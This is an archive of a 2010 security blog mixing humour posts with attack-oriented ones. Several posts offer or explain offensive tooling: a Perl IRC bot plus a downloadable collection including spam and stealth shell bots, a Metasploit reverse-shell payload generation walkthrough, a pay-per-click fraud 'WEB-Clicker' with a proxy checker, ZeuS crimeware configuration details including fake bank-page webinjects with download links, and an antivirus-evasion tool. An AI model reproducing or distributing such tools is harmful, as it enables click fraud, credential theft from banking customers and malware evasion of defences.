Sunday, January 31, 2010

Out Of Topic: iPad Laughter

My apologies for the second "out of topic" post. But a friend of mine sent to my email these very very funny images, I have no idea where he found them ... but they are really funny to me, so I decided to write a fast post on these cartoons.



These images don't represent my own idea. I don't agree but I don't disagree with them :D.

Saturday, January 30, 2010

Who Are You ?

Hey guys, this is an amazing flowchart describing your kind of life based on the question: Do you like Money ? ".



Thursday, January 28, 2010

PS3, Good Job George.



You're right George, the idea is pretty easy, BUT the implementation .... WOW ! I really enjoined the way you hooked up the bus and injected junk bytes ... I know you're working to this projects from many years, you really deserve all the credit of this hacks. !

Now for folks who doesn't know what I'm talking about, here one of the best articles to understand what he did. And here you can download the PS3 Exploit . If you click on those links there will be adv and then rapid share ... blah blah blah... I know.. you can find it just googling without ADV and RapidShare. I have my personal Collector on Rapid Share, and I really wanna keep the orginal PS3 exploit by George, so I putted it into my own collection. So if you wanna download it through my pages, please be patient about that.

Tuesday, January 26, 2010

IRC Bots: a small collection

Hello folks it's a while that I receive emails about IRC bots. Someone is interested on understanding how they works other ones are interested on how to write them.... If you check on google you will find tons of bots, but most of all are very complicated and hard to understand.
So, you' ll probably need more powerful IRC bots, but these perl bots helped me a lot understanding how to build my personal "home made" IRCBot. These script are pretty old, I came into this topic several years ago... but they works great also today.

Everything started from the basic IO Socket library:

#!/usr/bin/perl -w

# First and Basic Example of IRC bot

# http://marcoramilli.blogspot.com

##################################

use IO::Socket;


my $server = $ARGV[1];

my $user = 'marcoramilli';

my $botnick = $ARGV[0];

my $nickservpass = $ARGV[2];


if(@ARGV < 2) {

print STDOUT "Usage: $0 [nick] [server] [nickserv pass] -- if nickname is not registered , leave it blank.\n";

exit; }


$con = IO::Socket::INET->new(PeerAddr=>$server,

PeerPort=>'6667', # change this if needed..

Proto=>'tcp',

Timeout=>'30') || print "Error: Connection\n";


print $con "USER $user\r\n";

print $con "NICK $botnick\r\n";

if(@ARGV == 3) {

print $con "privmsg nickserv IDENTIFY $nickservpass\r\n"; } # if $ARGV[2] exists..

print $con "JOIN #channel\r\n"; # modify that ..


while($answer = <$con>) {


# #

# add code here #

# #


if($answer =~ m/^PING (.*?)$/gi) {

print $con "PONG ".$1."\n"; # replying to pings..

}


print STDOUT $answer; # printing $answer to the terminal..

}


I definitely suggest to take a look to my small but interesting ICRBot collection if you are interested on having some basic about bot programming. You probably want to reuse part of the code and/or mix it with your own. In the collection you'll find :


  1. Simple BOT (actually the code is up here)
  2. Bot Sniffer
  3. IRC spam Bot
  4. MD5 cracker irc bot
  5. The Santa Bot
  6. Stealth ShellBot
  7. [ ... not really much more ... ]

Obviously everything is only for research purpose on socket programming and on computer science security. The bots cannot be installed on unaware systems, you can install the bots only on your own systems.


Have fun !

Sunday, January 24, 2010

Graphic User Interface On RoboAdmin

Hello folks,
we are really close to release a new version of RoboAdmin (http://roboadmin.sourceforge.net).


The next version will have a Graphic User Interface ! In this way will not be so difficult to configure everything ! A nice GUI will be setup to increase the database management and than, a run and stop service button avoiding the annoy java CLI . Unfortunately I discovered some people are using RoboAdmin to manage evil botnets and this is bad... RoboAdmin doesn't want to be used as an hacking tool, but contrary it wanna be a secure tool for system administrators.
As everything in Security the risk to make something which could be used to bad purpose is very high, for instance you can use nmap for monitoring your own network or you can use it as first step of an intrusion. Again you can use metasploit to check your system vulnerabilities or to hack the google network ... A lot of security tools might be used as a penetration tester or as attacker in the same way. We are sorry about that, but it is not our responsibility if people use it as hacking tool.

Thursday, January 21, 2010

Payloads Generator Never So Easy

Hi Folks, today I wanna talk about payloads.
Do you remember how difficult was to obtain a good payload to write your own shellcode ?
I remember these very useful links (1),(2),(3). At the beginning was mad: pointers, assembly, decompilers and tools to remove null bytes.... now everything is just EASY thank to metasploit (link is useless, everybody knows where to get it).
So, let's generate a payload to embed in our source code.
  1. Select the payload that you like
  2. Configure it
  3. Generate the crafted payload
The above picture shows the configuration process that basically means:
  • show payloads
  • use
  • set LHOST
Now comes the fun. Using the command generate you can automatically generate the shellcode on you favorite language such as: ruby, perl, c or raw. Let's try to generate the payload for a perl script. First of all select the payload that you like (I'm going to use the normal windows/shell/reverse_tcp) then configure it (aka set LHOST) and at the end generate the payload using generate -t perl .



Here it is ! Easy ! :D
Now, let's imagine you wanna encode your payload, generate -e is made for you. To show a list of available encoders just type show encoders and then utilize what you like more. Again, thank to metasploit the complicate and time consuming process of making payloads becomes easy and pretty intuitive. Good Job !

Tuesday, January 19, 2010

Proxy Checker

Some of you guys asked me if I have something to check the active proxies inside a generic ProxyList.txt ( If you wanna download the list please read the this: WEB-Clicker ).

BTW, why don't you write some more comments on my blog instead of write me tons of emails ? Just kidding.. emails are fine !

Of course I have it. here it is .


############################################

#!/usr/bin/perl

# Proxy Checker

# http://marcoramilli.blogspot.com

############################################


use WWW::Mechanize;

@proxy=`cat proxy.lst`;


foreach $i (@proxy) {

chomp($i);

my $go = WWW::Mechanize->new( agent=> "Mozilla/5.0" );

$go->proxy(['http'], 'http://'.$i.'/');

$go->get('http://www.whatismyip.com');

$match = $go->content;

# print "$match\n";

my($crap,$ip)=split(/^(.*):/,$i);print "$i -> ";

if ($match =~ m/(.*)Your IP Is $ip(.*)/ ) { print "Ok.\n";

open(LOG,">> proxy.log"); print LOG "$i\n"; close(LOG);

}

else { print "Nop\n"; }

}


BTW, why don't you write some comments instead to email me ? :D

Just kidding, emails are fine.



Sunday, January 17, 2010

WEB-Clicker + Proxy List


Today I received 5 emails asking about my personal WEB-Clicker.
First of all, let me explain why, people are asking for my own WEB-Clicker when you can find a lot of them just asking to google.




Most of commercial and not commercial WEB-Clickers use a simple HTML GET (or POST) to obtain the page. Nowadays the pay-per-click services use intelligent countermeasures against this attack by adding cookies and javascritp inside the page. Basically it is not enough sending a GET and wait for the response, the pay-per-click page needs some more computation (like a 3 way handshake ). For these reasons normal WEB-Clickers wont work if run on pay-per-click pages. What has needed is a true and full working browser able to compute javascript (and maybe Flash for the early future) and to store cookies.

The v0.1 is the first alpha of my WEB-Clicker script, which actually is in v2.3. I cannot share the last version, but I am sure you guys will appreciate it. You can use it as the "first brick" of your own personal WEB-Clicker, by modifying and integrate it like you want. (please lets the initial comment with my blog on it). The version 0.1 has not GUI, works only with Firefox3, resolves some common issues like: using different proxy servers, running multiple Firefox's sessions per time and building run time Firefox's profiles.

Ah, almost forgot ... The zip file (WEB-CLICKER_V0.1) wraps sources and a nice Proxy List.

Here it is: WEB-CLICKER_V0.1

Saturday, January 16, 2010

Aurora: IE vulnerability used against google

The video below demonstrates how Google and the rest have been, according to most news reports, exploited via the “Aurora” vulnerability in Internet Explorer, and had their “intellectual property” taken.

In the video you will see Metasploit set up a listening session, set up a web site that serves up the malicious code, and watch as an unsuspecting user visits the web site, triggers the attack that uses the IE vulnerability, and unknowingly opens a connection to a computer owned by the attacker. The attacker then lists the user’s processes, and elects to kill Notepad where the user was working on an important document. IE 6.0 is used, as this is the version Microsoft references as having been used in the “targeted attacks” on some 30+ U.S. companies.

A silly example for demonstration to be sure, but once the backdoor is open to the user’s PC the attacker can use it as a pivot point for other attacks against the internal network, escalate his or her privileges, take information off the PC, basically do anything the user can do.


The "Aurora" IE Exploit in Action

Here the attack vector (click to make it bigger):

Friday, January 15, 2010

ATM (in)Security.

Day after day, ATM machine's attacks become even more difficult to detect .
At the beginning cloning devices were easy to recocgnize since they were very different from the original machine' s card reader. Now they look like the original ATM card readers (see the following scary pictures).







The wireless reader is on the top of the original one (on the bottom right of the picture). Same color, same dimension, same looks at all. It has been forged for this particular brand. The phone on the top has an extra battery pack and through BlueTooth reads the ATM cards. It uses a simple java application to write an email within ATM's code and the pin number to he attacker.

This is another example on DIEBOLD ATM wireless cloned reader. On board it looks like that:



Disassembled looks like that :

Font


Back


Please be aware that these attacks day by day become more common. If you see something weird on you usual ATM machine call 911, the risk is increasing a lot.

Tuesday, January 12, 2010

Reviewing Time


Hi Folks,
it's about 6 days that I don't write on my blog. I received some mails asking if I was good ! :D
Thanks you guys, I am so impressed about that ! This time of the year is review time for me. I have to review some articles and some papers for magazines and conferences, it keeps a lot of time. I really enjoy being a reviewer for famous magazines and conference because they give the chance to read really new thematics before all other readers. So, stay tuned I'll coming up with new interesting researching topics



Wednesday, January 6, 2010

ZeuS DIY Kit.

Hello folks,
this morning I found a ZeuS seller who offered it to me, "only 6000 dollars" :D (click the pic to make it readable).




Well, why should I buy it ? I work all day long with Malwares ! I really really don't wanna buy one !


BUT, since I remember from older versions that ZeuS was not very intuitive, I decided to public this little post on it. This post won't be a tutorial or a ZeuS using guideline, it might be useful to clarify what ZeuS is and How it works.

So for everyone who don't know what Zeus is:

ZeuS (also known as Zbot / WSNPoem) is a crimeware kit, which steals credentials from various online services like social networks, online banking accounts, ftp accounts, email accounts and other (phishing). The web admin panel can be bought for 700$ (source: RSA Security 4/21/2008) and the exe builder for 4'000$ (source: Prevx 3/15/2009).


The crimeware kit contains the following modules:

1) A web interface to administrate and control the botnet (ZeuS Admin Panel) (see number 4, yellow)
2) A tool to create the trojan binaries and encrypt the config file (see number 2)
3) A configuration file (see number 1)
4) A binary file which contains the newest version of the ZeuS trojan (see number 3)
5) A webijects file for advance usage (phishing page, see number 5)






To properly use DIY toolkit the tester needs to configure the config file which will be loaded and encrypted in a bin file.
There aren't several examples around, so I decided to discuss a little bit more about that. The file is divided into two main sections :
1) Static Configurations. Static configuration describes the actions that ZeuS does directly from the PC without injecting or interfering to the user. These actions can be: steal static passwords, steal cache informations, visited websites, emails, chats conversations and so on. Inside the static configuration the tester finds the "url_config". This entry is really important, in fact through it tester may change dynamically the bot configuration by changing the file in this location. Basically the bot looks for it during it booting phase.



2) Dynamic Configurations, Dynamic Configuration describes the actions that ZeuS does interacting with the user. Examples of Dyn conf could be: automatic downloader and executable, injecting fake Bank of America pages stealing credentials or utilizing common Man in the middle techniques injecting dynamic contents. ZeuS needs the url to the loader and the url of the server where redirect the traffic and where download itself. The file_webinjects is the main file of the dynamic configuration. Basically tester tells to the system where the "important" information are. This configuration file is "platform dependent" by meaning that it depends on which web page you wanna exploit. (don't worry I'll let you some true example at the end of the post)



The tester may want do add an "advanced" (in terms of different) configuration file to the same bot (underlined in green in previous img). An example of webinjects file is the following one. As first parameter the tester has to define which url is going to be analyzed, then he needs to underline where the sensible informations are by injecting fake contents.




True configuration files are more complicate. There are more "entries" like for example :
1) "WebFilters" . To filters some urls. Example: ”*.fedbank.com/*”
2) "WebDataFilters". To look for some data inside the parameters. Example : "gmail.google.com/*" "passw;login"
3) "WebFakes". To force the user to surf a phised page. Example: "https://sitekey.bankofamerica.com/sas/signon.do" "http://XXX.YYY.ZZZ.HHH/zu/fk/US/bofa.php" "P" USpass=*" ""

To check out the full configuration files: webinjects.txt.zip and config2.txt.zip
The ZeuS version 1.0.3.7, From RapidShare here .

Monday, January 4, 2010

More on EICAR


Hi folks, today I wanna show these two easy experiments made by using the new version of "Quick'n Dirty" EICAR-GTUBE-Generator0.1. I know that EICAR file it's only a test file and it is not supposed to be recognized inside other files, BUT for some reasons some AVs do that. Analyzing this file we can analyze the AV's detection chain (as already explained in some past posts ) and maybe find some incompleteness.

Exp 1. Hiding EICAR file in the JPG header



Most AVs (but not all ... ) detect EICAR file even if embedded into the JPG header. Some main AV companies like AVAST, McAfee and Microsoft dont (why they cannot detect it ?).

2) Hiding EICAR file in the JPG tail:



Surprisingly only two AV companies detect it. My best compliments to Authentium and F-Port. So why Authentium and F-Port can detect EICAR even if hidden in the JPG'tail and other AV companies cannot ? What's the difference between their detection chain ?

I'll ask directly to these people during this week, I'll be back with some answers ... hopefully.

Saturday, January 2, 2010

AVFucker New Version

Hi Folks,
in these two past days I received a lot of comments of my pretty old AVFucker tool. It is a little project written some years ago for an "underground community" to fuck AVs using the "replace byte signature" techniques. Some people would like to see this software in multi platform version and not only a Windows Dependent executable (wow .. it should be very old... I don't write something for windows from years.. really). Well, I don't know why they need it in a platform independent language, the "replace byte signature" techniques (pretty old) works only for Windows PE .... so why an independent software for changing PE files ? Anyway, since there are plenty requests I don't care, here the link to the new AVFucker written in Java. :D




The interface is pretty much the same, 4 steps as usual.

Friday, January 1, 2010

The Culf of Done Manifesto

A very good friend of mine today pointed me out this nice Cult: " the cult of done".

The Cult of Done Manifesto by Bre Pettis and Kio Stark. They wrote it in 20 minutes, “because we only had 20 minutes to get it done.”

Here it is :

1) There are three states of being. Not knowing, action and completion.
2) Accept that everything is a draft. It helps to get it done.
3) There is no editing stage.
4) Pretending you know what you’re doing is almost the same as knowing what you are doing, so just accept that you know what you’re doing even if you don’t and do it.
5) Banish procrastination. If you wait more than a week to get an idea done, abandon it.
6) The point of being done is not to finish but to get other things done.
7) Once you’re done you can throw it away.
8) Laugh at perfection. It’s boring and keeps you from being done.
9) People without dirty hands are wrong. Doing something makes you right.
10) Failure counts as done. So do mistakes.
11) Destruction is a variant of done.
12) If you have an idea and publish it on the internet, that counts as a ghost of done.
13) Done is the engine of more.



Here the second amazing Manifesto (source PSD file), and here the previous High Resolution file.